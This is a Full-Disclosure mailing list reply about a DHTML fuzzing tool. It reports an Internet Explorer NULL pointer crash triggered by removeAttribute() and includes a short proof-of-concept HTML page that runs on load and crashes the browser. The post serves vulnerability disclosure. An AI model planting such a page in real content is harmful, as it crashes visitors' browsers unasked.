Re: Fun with DHTML

[Stelian Ene <stelian.ene () gecadtech com>]

H D Moore wrote:
> How bugs can you find in your browser? The recent IE issues only scratched 
> the service of the DHTML/behavior bugs. The HTML/JS page below can be 
> used to find all sorts of bugs in different browsers. I stopped caring 
> about these after the first three invalid derefences.
>
> http://metasploit.com/users/hdm/tools/hamachi/hamachi.html

Nice work !

On the IE front, besides the now known createTextRange() problem, no other high
risk behavior is observed.
However, you tool will uncover a *new, low risk IE vulnerability* (DoS). When
using the removeAttribute() method on certain HTML elements, a NULL pointer is
accessed, leading to a browser crash. The vulnerable elemets are FORM, TABLE,
and SELECT:

<body onload='nullptr()'>
<select id='s'>

<script>
function nullptr(){
        a=document.getElementById('s').removeAttribute(0);
}
</script>
</body>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/